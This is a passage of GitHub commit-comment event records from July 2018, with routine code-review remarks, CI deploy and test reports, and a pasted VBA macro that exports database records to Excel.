{"id":"7966974609","type":"CommitCommentEvent","actor":{"login":"philipce"},"repo":{"name":"nifty-swift/Nifty"},"payload":{"comment":{"id":29711737,"position":null,"line":null,"path":null,"commit_id":"5a7c827007caad8844daf20ef3c2a807dce405ee","created_at":"2018-07-15T07:48:19Z","updated_at":"2018-07-15T07:48:19Z","author_association":"COLLABORATOR","body":"Oh, I remembered what the ** were for (saw I'd mentioned it in slack). These were the functions I thought would probably use lapack/blas"}},"created_at":"2018-07-15T07:48:19Z"}
{"id":"7966975920","type":"CommitCommentEvent","actor":{"login":"philipce"},"repo":{"name":"nifty-swift/Nifty"},"payload":{"comment":{"id":29711741,"position":null,"line":null,"path":null,"commit_id":"619ba8f58e543df943e6c21155cc6c3c75f0614b","created_at":"2018-07-15T07:49:41Z","updated_at":"2018-07-15T07:49:41Z","author_association":"COLLABORATOR","body":"Apparently in 4.2, this behavior goes back to what it was in 4.0, so this may have been a bug in 4.1"}},"created_at":"2018-07-15T07:49:41Z"}
{"id":"7966976533","type":"CommitCommentEvent","actor":{"login":"cigamit"},"repo":{"name":"Cacti/cacti"},"payload":{"comment":{"id":29711743,"position":10,"line":60,"path":"auth_changepassword.php","commit_id":"5aead0c8fea5361b071311eb95ad2d884ef7920c","created_at":"2018-07-15T07:50:17Z","updated_at":"2018-07-15T07:50:17Z","author_association":"MEMBER","body":"Isn't that sick, it's n-1 as stored in the database, and I don't want to change/fix it at the moment."}},"created_at":"2018-07-15T07:50:17Z"}
{"id":"7966976546","type":"CommitCommentEvent","actor":{"login":"uekichi"},"repo":{"name":"uekichi/assessment"},"payload":{"comment":{"id":29711744,"position":null,"line":null,"path":null,"commit_id":"8bfe860cbcab2a6018d667251fb60661fbfd7deb","created_at":"2018-07-15T07:50:18Z","updated_at":"2018-07-15T07:50:18Z","author_association":"OWNER","body":"8bfe860 で対応されました。"}},"created_at":"2018-07-15T07:50:18Z"}
{"id":"7966977538","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29711745,"position":11,"line":8,"path":"config-service/src/main/resources/shared/finance-service.yml","commit_id":"81a0d7d92641688e63826841a22d9e9919943b21","created_at":"2018-07-15T07:51:17Z","updated_at":"2018-07-15T07:51:17Z","author_association":"OWNER","body":"Based on Spring Sleuth docs\r\n\r\n> Starting from Sleuth 2.0.0 you have to pass the baggage key names explicitly in your project configuration\r\n\r\nBut zipkin seems not getting any details when used `spring.sleuth.baggage-keys:\r\n      - service\r\n      - finance`"}},"created_at":"2018-07-15T07:51:17Z"}
{"id":"7966978656","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29711747,"position":null,"line":null,"path":null,"commit_id":"fdd9440c78934547ac0656ea912e271facdcf7e7","created_at":"2018-07-15T07:52:26Z","updated_at":"2018-07-15T07:52:26Z","author_association":"NONE","body":"### Results for event id: 85df4a4d-6b2f-40cc-9af1-e93eae98edbb\n<details><summary>DockerServerless : Deploy to Lambda (acb97c) Execution completed.</summary>\n<p>\n\n**output tail (289 lines total):**\n\n```\n...\nregion: ap-southeast-2\nstack: sample-http-dev\napi keys:\n  None\nendpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev/sample-http\nfunctions:\n  sample-http: sample-http-dev-sample-http\n\nStack Outputs\nSampleDashhttpLambdaFunctionArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-http-dev-sample-http\nApiGatewayRestApiRootResource: q643s5bj1a\nApiGatewayRestApi: yeajzvl29j\nServiceEndpoint: https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: io.zoto.serverless.dev\nServerlessAliasReference: REFERENCE\n\nServerless: Removing old service artifacts from S3...\nDone in 71.36s.\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 85df4a4d-6b2f-40cc-9af1-e93eae98edbb-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/85df4a4d-6b2f-40cc-9af1-e93eae98edbb-output.tar.gz\n{\n    \"ETag\": \"\\\"2a4c973b4e857d3b26449a267d9a0a3e\\\"\"\n}\nExecution time was 130 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-15T07:52:26Z"}
{"id":"7966978859","type":"CommitCommentEvent","actor":{"login":"xdtianyu"},"repo":{"name":"xdtianyu/CallerInfo"},"payload":{"comment":{"id":29711748,"position":null,"line":null,"path":null,"commit_id":"4d99973c7b4fd1d5fd4efef60122ce3059bb64cc","created_at":"2018-07-15T07:52:38Z","updated_at":"2018-07-15T07:52:38Z","author_association":"OWNER","body":"fixed #113"}},"created_at":"2018-07-15T07:52:38Z"}
{"id":"7966979074","type":"CommitCommentEvent","actor":{"login":"talkol"},"repo":{"name":"orbs-network/orbs-network-go"},"payload":{"comment":{"id":29711749,"position":18,"line":18,"path":"test/harness/services/gossip/adapter/tempering_transport_contract_test.go","commit_id":"bb4a7f2f3907b2931c341b61d461b897758b3a09","created_at":"2018-07-15T07:52:53Z","updated_at":"2018-07-15T07:52:53Z","author_association":"NONE","body":"Fixed in a following commit"}},"created_at":"2018-07-15T07:52:53Z"}
{"id":"7966980897","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29711750,"position":null,"line":null,"path":null,"commit_id":"25c60d0fc0a701151c448c8a57ffe92c99bb0261","created_at":"2018-07-15T07:54:51Z","updated_at":"2018-07-15T07:54:51Z","author_association":"NONE","body":"### Results for event id: 64b63f14-9d35-4174-ab2d-f877f04a7d74\n<details><summary>DockerServerless : Deploy to Lambda (eea752) Execution completed.</summary>\n<p>\n\n**output tail (283 lines total):**\n\n```\n...\nregion: ap-southeast-2\nstack: sample-http-dev\napi keys:\n  None\nendpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev/sample-http\nfunctions:\n  sample-http: sample-http-dev-sample-http\n\nStack Outputs\nSampleDashhttpLambdaFunctionArn: arn:aws:lambda:ap-southeast-2:347186442473:function:sample-http-dev-sample-http\nApiGatewayRestApiRootResource: q643s5bj1a\nApiGatewayRestApi: yeajzvl29j\nServiceEndpoint: https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/dev\nServerlessDeploymentBucketName: io.zoto.serverless.dev\nServerlessAliasReference: REFERENCE\n\nServerless: Removing old service artifacts from S3...\nDone in 71.68s.\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: 64b63f14-9d35-4174-ab2d-f877f04a7d74-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/64b63f14-9d35-4174-ab2d-f877f04a7d74-output.tar.gz\n{\n    \"ETag\": \"\\\"4cea3d367bb43cdfd61eb3484a16b832\\\"\"\n}\nExecution time was 130 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-15T07:54:51Z"}
{"id":"7966982010","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29711752,"position":15,"line":31,"path":"finance-service/src/main/java/com/emprovise/service/api/StockResource.java","commit_id":"81a0d7d92641688e63826841a22d9e9919943b21","created_at":"2018-07-15T07:55:57Z","updated_at":"2018-07-15T07:55:57Z","author_association":"OWNER","body":"By default HystrixConcurrencyStrategy called TraceCallable that wraps all Callable instances in their Sleuth representative is used for Hystrix which can be disabled using `spring.sleuth.hystrix.strategy.enabled=false`. Other alternative is to wrap tracing information using Sleuth's TraceCommand as below:\r\n\r\n```\r\nTraceCommand<String> traceCommand = new TraceCommand<String>(tracer, setter) {\r\n\t@Override\r\n\tpublic String doRun() throws Exception {\r\n\t\treturn someLogic();\r\n\t}\r\n};\r\n```"}},"created_at":"2018-07-15T07:55:57Z"}
{"id":"7966982185","type":"CommitCommentEvent","actor":{"login":"eunicode"},"repo":{"name":"eunicode/twitch-status"},"payload":{"comment":{"id":29711755,"position":null,"line":null,"path":null,"commit_id":"7d58fbbdbd3a91db51177c715adbd8b7a64402ae","created_at":"2018-07-15T07:56:07Z","updated_at":"2018-07-15T07:56:07Z","author_association":"OWNER","body":"Could not use ES6 modules until I included module in my HTML as an external script tag with type=\"module\".\r\nRead more here: https://medium.com/dev-channel/es6-modules-in-chrome-canary-m60-ba588dfb8ab7"}},"created_at":"2018-07-15T07:56:07Z"}
{"id":"7966983715","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29711757,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-15T07:57:42Z","updated_at":"2018-07-15T07:57:42Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2975 of 2975 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-15T07:57:42Z"}
{"id":"7966983725","type":"CommitCommentEvent","actor":{"login":"Pixabayhao"},"repo":{"name":"Pixabayhao/simple-java-maven-app"},"payload":{"comment":{"id":29711758,"position":null,"line":null,"path":null,"commit_id":"342248126e7ed3b73741a48c2921c213e1ba380c","created_at":"2018-07-15T07:57:42Z","updated_at":"2018-07-15T07:57:42Z","author_association":"OWNER","body":"提交的很好，verygood"}},"created_at":"2018-07-15T07:57:42Z"}
{"id":"7966983981","type":"CommitCommentEvent","actor":{"login":"eb4x"},"repo":{"name":"CanonicalLtd/curtin"},"payload":{"comment":{"id":29711759,"position":null,"line":null,"path":null,"commit_id":"a909966f9c235282267024e86adf404dab83ccfe","created_at":"2018-07-15T07:57:57Z","updated_at":"2018-07-15T07:57:57Z","author_association":"NONE","body":"From the swapon man page;\r\n> The swap file implementation in the kernel expects to be able to write to the file directly, without the assistance of the filesystem.  This is a problem on preallocated files  (e.g.   fallocate(1)) on filesystems like XFS or ext4, and on copy-on-write filesystems like btrfs.\r\n>\r\n> It is recommended to use dd(1) and /dev/zero to avoid holes on XFS and ext4.\r\n\r\nThanks for adding dd as a fallback, now perhaps we can make it the default instead?"}},"created_at":"2018-07-15T07:57:57Z"}
{"id":"7966986220","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711763,"position":62,"line":62,"path":"src/lesson2/Task1.java","commit_id":"3a3677db1b03f8b1a457d9a3c3f442a7f3b932f4","created_at":"2018-07-15T08:00:04Z","updated_at":"2018-07-15T08:00:04Z","author_association":"NONE","body":"switch должен иметь по код конвешену default контструкцию после всех case"}},"created_at":"2018-07-15T08:00:04Z"}
{"id":"7966986818","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711770,"position":65,"line":65,"path":"src/lesson2/Task1.java","commit_id":"3a3677db1b03f8b1a457d9a3c3f442a7f3b932f4","created_at":"2018-07-15T08:00:26Z","updated_at":"2018-07-15T08:00:26Z","author_association":"NONE","body":"стараться придерживаться того, чтобы из функции был только один return"}},"created_at":"2018-07-15T08:00:26Z"}
{"id":"7966987429","type":"CommitCommentEvent","actor":{"login":"mcd500"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29711771,"position":null,"line":null,"path":null,"commit_id":"b362334560dc1020fddd44587f7a9be189da7d8a","created_at":"2018-07-15T08:00:53Z","updated_at":"2018-07-15T08:00:53Z","author_association":"CONTRIBUTOR","body":"Fixes #125."}},"created_at":"2018-07-15T08:00:53Z"}
{"id":"7966987480","type":"CommitCommentEvent","actor":{"login":"ihexon"},"repo":{"name":"ihexon/setupkali"},"payload":{"comment":{"id":29711772,"position":32,"line":56,"path":"apt_mirrors.sh","commit_id":"90142fdd4b5b488ea0c4270199d9a19df6e04506","created_at":"2018-07-15T08:00:56Z","updated_at":"2018-07-15T08:00:56Z","author_association":"OWNER","body":"如果能用getopts就更好了，慢慢来....>_<"}},"created_at":"2018-07-15T08:00:56Z"}
{"id":"7966987731","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711773,"position":70,"line":70,"path":"src/lesson2/Task1.java","commit_id":"3a3677db1b03f8b1a457d9a3c3f442a7f3b932f4","created_at":"2018-07-15T08:01:08Z","updated_at":"2018-07-15T08:01:08Z","author_association":"NONE","body":"не надо делать отступа в первой строке метода"}},"created_at":"2018-07-15T08:01:08Z"}
{"id":"7966988052","type":"CommitCommentEvent","actor":{"login":"pranav-patil"},"repo":{"name":"pranav-patil/spring-microservices"},"payload":{"comment":{"id":29711775,"position":20,"line":57,"path":"finance-service/src/main/java/com/emprovise/service/api/StockResource.java","commit_id":"81a0d7d92641688e63826841a22d9e9919943b21","created_at":"2018-07-15T08:01:20Z","updated_at":"2018-07-15T08:01:20Z","author_association":"OWNER","body":"When the @NewSpan or @ContinueSpan annotation is used, the timestamp and duration is not sent to zipkin as per \r\n[Issue 855](https://github.com/spring-cloud/spring-cloud-sleuth/issues/855). Hence directly use `tracer.nextSpan()` or `tracer.currentSpan().tag().`"}},"created_at":"2018-07-15T08:01:20Z"}
{"id":"7966988603","type":"CommitCommentEvent","actor":{"login":"kana-mu"},"repo":{"name":"Dapuluous/KoperasiDapu"},"payload":{"comment":{"id":29711776,"position":null,"line":null,"path":null,"commit_id":"a94fb2603920e2d4ac53d274c8eeb70cd8e3ebdb","created_at":"2018-07-15T08:01:49Z","updated_at":"2018-07-15T08:01:49Z","author_association":"NONE","body":"dapuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu"}},"created_at":"2018-07-15T08:01:49Z"}
{"id":"7966988950","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711778,"position":123,"line":123,"path":"src/lesson2/Task1.java","commit_id":"3a3677db1b03f8b1a457d9a3c3f442a7f3b932f4","created_at":"2018-07-15T08:02:09Z","updated_at":"2018-07-15T08:02:09Z","author_association":"NONE","body":"то же самое, нет секции default"}},"created_at":"2018-07-15T08:02:09Z"}
{"id":"7966989367","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29711780,"position":null,"line":null,"path":null,"commit_id":"b46db8d3ea2a72281a516814ec9bd4f7397ce700","created_at":"2018-07-15T08:02:30Z","updated_at":"2018-07-15T08:02:30Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b46db8d3ea2a72281a516814ec9bd4f7397ce700-PR6728-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T08:02:30Z"}
{"id":"7966989607","type":"CommitCommentEvent","actor":{"login":"johnou"},"repo":{"name":"lukehutch/fast-classpath-scanner"},"payload":{"comment":{"id":29711781,"position":4,"line":49,"path":"src/main/java/io/github/lukehutch/fastclasspathscanner/utils/NestedJarHandler.java","commit_id":"4fe2edd37c99e2bba6a92ac3748dd220fb34728a","created_at":"2018-07-15T08:02:44Z","updated_at":"2018-07-15T08:02:44Z","author_association":"CONTRIBUTOR","body":"Absolutely, pretty sure I have a fix for that, I'll put up a pr later today."}},"created_at":"2018-07-15T08:02:44Z"}
{"id":"7966989925","type":"CommitCommentEvent","actor":{"login":"Blacksuan19"},"repo":{"name":"Dark-Matter7232/Moded_Moun_Kernel_Tissot"},"payload":{"comment":{"id":29711785,"position":null,"line":null,"path":null,"commit_id":"c325c052ddb0a7c567df19e6c6cbb21664826409","created_at":"2018-07-15T08:03:02Z","updated_at":"2018-07-15T08:03:02Z","author_association":"NONE","body":"wow \r\nthis is next level stuff\r\nyou just went god mode ma dude lmao"}},"created_at":"2018-07-15T08:03:02Z"}
{"id":"7966990975","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711786,"position":127,"line":127,"path":"src/lesson2/Task1.java","commit_id":"3a3677db1b03f8b1a457d9a3c3f442a7f3b932f4","created_at":"2018-07-15T08:04:05Z","updated_at":"2018-07-15T08:04:05Z","author_association":"NONE","body":"пока ок, т.к. мы не прошли с вами классы, но в идеале должно быть две функции: первая переводит текущаю дату на след день, а вторая функция - форматирует эту дату"}},"created_at":"2018-07-15T08:04:05Z"}
{"id":"7966992186","type":"CommitCommentEvent","actor":{"login":"Stephan202"},"repo":{"name":"google/error-prone"},"payload":{"comment":{"id":29711788,"position":6,"line":1532,"path":"check_api/src/main/java/com/google/errorprone/matchers/Matchers.java","commit_id":"1736cc186bfd79180ff1d869d8219cbb03564a3b","created_at":"2018-07-15T08:05:19Z","updated_at":"2018-07-15T08:05:19Z","author_association":"CONTRIBUTOR","body":"`{@link` (also in the existing method above)."}},"created_at":"2018-07-15T08:05:19Z"}
{"id":"7966993051","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711789,"position":10,"line":10,"path":"src/lesson2/Task2.java","commit_id":"3a3677db1b03f8b1a457d9a3c3f442a7f3b932f4","created_at":"2018-07-15T08:06:11Z","updated_at":"2018-07-15T08:06:11Z","author_association":"NONE","body":"делать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T08:06:11Z"}
{"id":"7966993477","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29711790,"position":40,"line":40,"path":"src/lesson2/Task2.java","commit_id":"3a3677db1b03f8b1a457d9a3c3f442a7f3b932f4","created_at":"2018-07-15T08:06:37Z","updated_at":"2018-07-15T08:06:37Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-15T08:06:37Z"}
{"id":"7966994778","type":"CommitCommentEvent","actor":{"login":"cpu20"},"repo":{"name":"guyc/py-gaugette"},"payload":{"comment":{"id":29711793,"position":7,"line":15,"path":"gaugette/switch.py","commit_id":"d7dc7a84a037bc5555915c82ab934341648f13f6","created_at":"2018-07-15T08:07:54Z","updated_at":"2018-07-15T08:07:54Z","author_association":"NONE","body":"My original idea was to use the edge variable to pass a 0 or a 1 and then decide on which edge to trigger. But after changing it to passing gpio.EDGE it seems like I forgot to remove the conditional branch.\r\nI'll remove the conditional and commit the change!"}},"created_at":"2018-07-15T08:07:54Z"}
{"id":"7966995837","type":"CommitCommentEvent","actor":{"login":"Nzza"},"repo":{"name":"Nzza/Enve"},"payload":{"comment":{"id":29711796,"position":2,"line":2,"path":"README.md","commit_id":"0c3eb889a91dee078acecf5d702ddc553579b3d4","created_at":"2018-07-15T08:08:55Z","updated_at":"2018-07-15T08:08:55Z","author_association":"OWNER","body":"Este es un proyecto genial destinado al aprendizaje de luis felipe naranjo fuerte\r\n"}},"created_at":"2018-07-15T08:08:55Z"}
{"id":"7966996344","type":"CommitCommentEvent","actor":{"login":"amarpreetcloud"},"repo":{"name":"amarpreetcloud/IRC-Commentary-tool"},"payload":{"comment":{"id":29711797,"position":2,"line":2,"path":"README.md","commit_id":"19fcc3208d86b37b6a64851c523ca8cc18734c8b","created_at":"2018-07-15T08:09:28Z","updated_at":"2018-07-15T08:09:28Z","author_association":"OWNER","body":"Option Explicit\r\n\r\nPublic Sub ExportSummary()\r\n    \r\n    '---\r\n    '---    Export to Excel\r\n    '---\r\n    \r\n    On Error GoTo errhandler\r\n    Dim oWkbk As Workbook\r\n    Dim oWksht As Worksheet\r\n    Dim db As New clsDatabase\r\n    Dim rs As New ADODB.Recordset\r\n    Dim i As Long\r\n    Dim dtCob As Date\r\n    Dim lLastRow As Long\r\n   \r\n    \r\n    Call ProtectWorkbook(False)\r\n    Call UpdateScreen(False)\r\n    Application.DisplayAlerts = False\r\n    \r\n    dtCob = ThisWorkbook.Names(\"rgcob\").RefersToRange\r\n    Set oWkbk = Workbooks.Add\r\n    Set oWksht = oWkbk.Sheets(1)\r\n    oWksht.Name = \"Uncapitalised Rejections\"\r\n    oWksht.Cells.Font.Size = 8\r\n    oWksht.Cells.Font.Name = \"Arial\"\r\n    Set rs = db.GetRecordset(\"Select * from tbl_Uncapitalised_Rejections\")\r\n    If rs.EOF = False And rs.BOF = False Then\r\n        For i = 0 To rs.Fields.Count - 1\r\n            oWksht.Cells(1, i + 1).Value = rs.Fields(i).Name\r\n        Next i\r\n        oWksht.Columns(2).NumberFormat = \"dd-mmm-yyyy\"\r\n        oWksht.Rows(1).Font.Bold = True\r\n        oWksht.Cells(2, 1).CopyFromRecordset rs\r\n        oWksht.Range(oWksht.Cells(1, 1), oWksht.Cells(1, 1).End(xlToRight)).Interior.Color = 10921638\r\n        oWksht.Cells.RowHeight = 30\r\n        oWksht.Cells(1, 1).CurrentRegion.Borders(xlInsideVertical).Weight = xlThin\r\n        oWksht.Cells(1, 1).CurrentRegion.Borders(xlInsideHorizontal).Weight = xlThin\r\n        oWksht.Cells(1, 1).CurrentRegion.BorderAround , xlThin\r\n        oWksht.Range(\"b:h\").EntireColumn.AutoFit\r\n        oWksht.Range(\"s:s\").ColumnWidth = 50\r\n    End If\r\n    rs.Close\r\n    Call ColorCodeUncapitalisedRejections(oWksht, dtCob)\r\n    \r\n    Set oWksht = oWkbk.Worksheets.Add\r\n    oWksht.Name = \"Capitalised Rejections\"\r\n    oWksht.Cells.Font.Size = 8\r\n    oWksht.Cells.Font.Name = \"Arial\"\r\n    Set rs = db.GetRecordset(\"Select * from tbl_Capitalised_Rejections\")\r\n    If rs.EOF = False And rs.BOF = False Then\r\n        For i = 0 To rs.Fields.Count - 1\r\n            oWksht.Cells(1, i + 1).Value = rs.Fields(i).Name\r\n        Next i\r\n        oWksht.Rows(1).Font.Bold = True\r\n        oWksht.Cells(2, 1).CopyFromRecordset rs\r\n        oWksht.Cells.RowHeight = 30\r\n        oWksht.Range(oWksht.Cells(1, 1), oWksht.Cells(1, 1).End(xlToRight)).Interior.Color = 10921638\r\n        oWksht.Cells(1, 1).CurrentRegion.Borders(xlInsideVertical).Weight = xlThin\r\n        oWksht.Cells(1, 1).CurrentRegion.Borders(xlInsideHorizontal).Weight = xlThin\r\n        oWksht.Cells(1, 1).CurrentRegion.BorderAround , xlThin\r\n        oWksht.Range(\"b:o\").EntireColumn.AutoFit\r\n        oWksht.Range(\"d:d\").ColumnWidth = 50\r\n        oWksht.Range(\"d:d\").WrapText = True\r\n        oWksht.Range(\"y:y\").ColumnWidth = 50\r\n        oWksht.Range(\"AB:AC\").ColumnWidth = 50\r\n        oWksht.Range(\"AB:AC\").WrapText = True\r\n    End If\r\n    rs.Close\r\n    Call ColorCodeCapitalisedRejections(oWksht, dtCob)\r\n    \r\n    Call PrepareSummary(oWkbk, dtCob)\r\n    \r\n    For Each oWksht In oWkbk.Sheets\r\n        If Left(oWksht.Name, 5) = \"Sheet\" Then oWksht.Delete\r\n    Next\r\n    \r\n    Call ProtectWorkbook(True)\r\n    Call UpdateScreen(True)\r\n    \r\n    Call MsgBox(\"Export Complete\", vbInformation, \"IRC Commentary Tool\")\r\n    \r\n    \r\nexitsub:\r\n    Set rs = Nothing\r\n    Set db = Nothing\r\n    Set oWkbk = Nothing\r\n    Application.DisplayAlerts = True\r\n    Exit Sub\r\nerrhandler:\r\n    Call MsgBox(\"Error: \" & Err.Description, vbInformation, \"Error\")\r\n    Resume exitsub\r\n    Resume\r\n\r\nEnd Sub\r\n\r\nPublic Sub ColorCodeUncapitalisedRejections(oWksht, dtCob As Date)\r\n    Dim rngData As Range\r\n    Dim rngFilter As Range\r\n    \r\n    Set rngData = oWksht.UsedRange\r\n    'rngData.AutoFilter Field:=2, Operator:=xlFilterValues, Criteria2:=Array(2, Format(dtCob, \"dd-mmm-yyyy\"))\r\n    rngData.AutoFilter Field:=20, Operator:=xlFilterValues, Criteria1:=\"<>\" & Format(dtCob, \"dd-mmm-yyyy\")\r\n    rngData.AutoFilter Field:=23, Criteria1:=Array(\"IN-PROGRESS\", \"ON HOLD\", \"OPEN\", \"=\"), Operator:=xlFilterValues\r\n    \r\n    On Error Resume Next\r\n    \r\n    If Err.Number = 1004 Then\r\n        'Do nothing\r\n    Else\r\n        rngData.Resize(rngData.Rows.Count - 1).Offset(1).SpecialCells(xlCellTypeVisible).Interior.Color = 14408946\r\n    End If\r\n    oWksht.AutoFilterMode = False\r\n    Set rngData = Nothing\r\nEnd Sub\r\n\r\nPublic Sub ColorCodeCapitalisedRejections(oWksht, dtCob As Date)\r\n    Dim rngData As Range\r\n    Dim rngFilter As Range\r\n    \r\n    Set rngData = oWksht.UsedRange\r\n    'rngData.AutoFilter Field:=2, Operator:=xlFilterValues, Criteria2:=Array(2, Format(dtCob, \"dd-mmm-yyyy\"))\r\n    rngData.AutoFilter Field:=26, Operator:=xlFilterValues, Criteria1:=\"<>\" & Format(dtCob, \"dd-mmm-yyyy\")\r\n    rngData.AutoFilter Field:=27, Criteria1:=Array(\"IN-PROGRESS\", \"ON HOLD\", \"OPEN\", \"=\"), Operator:=xlFilterValues\r\n    rngData.AutoFilter Field:=3, Criteria1:=\"<>CP-VEN\"\r\n    \r\n    On Error Resume Next\r\n    \r\n    If Err.Number = 1004 Then\r\n        'Do nothing\r\n    Else\r\n        rngData.Resize(rngData.Rows.Count - 1).Offset(1).SpecialCells(xlCellTypeVisible).Interior.Color = 14408946\r\n    End If\r\n    oWksht.AutoFilterMode = False\r\n    Set rngData = Nothing\r\nEnd Sub\r\n\r\n\r\nPublic Sub PrepareSummary(oWkbk As Workbook, dtCob As Date)\r\n    Dim oWksht As Worksheet\r\n    \r\n    Set oWksht = oWkbk.Worksheets.Add\r\n    With oWksht\r\n        .Name = \"Summary\"\r\n        .Cells.Font.Size = 8\r\n        .Cells.Font.Name = \"Arial\"\r\n        .Cells(2, 1).Value = \"COB:\"\r\n        .Cells(2, 1).Font.Bold = True\r\n        .Cells(2, 2).Formula = dtCob\r\n        .Cells(2, 2).NumberFormat = \"dd/mm/yyyy\"\r\n        .Cells(2, 2).HorizontalAlignment = xlLeft\r\n        .Cells(2, 2).Font.Bold = True\r\n    End With\r\n        \r\n    Call PrepareUncapitalisedSummary(oWksht, oWkbk.Sheets(\"Uncapitalised Rejections\"), dtCob)\r\n    Call PrepareCapitalisedSummary(oWksht, oWkbk.Sheets(\"Capitalised Rejections\"), dtCob)\r\nEnd Sub\r\n\r\nPublic Sub SaveReport(oWkbk As Excel.Workbook, dtCob As Date)\r\n    Dim fso As New Scripting.FileSystemObject\r\n    Dim sYear As String\r\n    Dim sMonth As String\r\n    Dim sPath As String\r\n    \r\n    sPath = ThisWorkbook.Names(\"rgSavePath\").RefersToRange\r\n    sYear = Year(dtCob)\r\n    sMonth = Format(dtCob, \"mmm\")\r\n    \r\n    'Create Year Folder\r\n    If Not fso.FolderExists(sPath & \"\\\" & sYear) Then\r\n        Call fso.CreateFolder(sPath & \"\\\" & sYear)\r\n    End If\r\n        \r\n    'Create Month Folder\r\n    sPath = sPath & \"\\\" & sYear\r\n    If Not fso.FolderExists(sPath & \"\\\" & sMonth) Then\r\n        Call fso.CreateFolder(sPath & \"\\\" & sMonth)\r\n    End If\r\n    \r\n    'Save File\r\n    sPath = sPath & \"\\\" & sMonth\r\n    oWkbk.SaveAs sPath & \"\\\" & \"IRC Material Errors \" & Format(dtCob, \"yyyymmdd\") & \".xlsx\"\r\n    \r\n    oWkbk.Close False\r\n    \r\n    Set oWkbk = Nothing\r\nEnd Sub\r\n\r\nPublic Sub PrepareUncapitalisedSummary(oWkshtSummary As Worksheet, oWkshtData As Worksheet, currCob As Date)\r\n    Dim lRows As Long\r\n    Dim lLastRow As Long\r\n    Dim objSummary As clsUncapitalisedSummary\r\n    Dim objSummary1 As clsUncapitalisedSummary\r\n    Dim dictSummary As New Scripting.Dictionary\r\n    Dim key\r\n    \r\n    On Error GoTo errhandler\r\n    \r\n    With oWkshtData\r\n        lLastRow = .Cells(.Rows.Count, 1).End(xlUp).Row\r\n        .Sort.SortFields.Clear\r\n        .Sort.SortFields.Add key:=.Range(\"S2:S\" & lLastRow), SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal\r\n        .Sort.SetRange .Range(\"a1\").CurrentRegion\r\n        .Sort.Header = xlYes\r\n        .Sort.MatchCase = False\r\n        .Sort.Orientation = xlTopToBottom\r\n        .Sort.SortMethod = 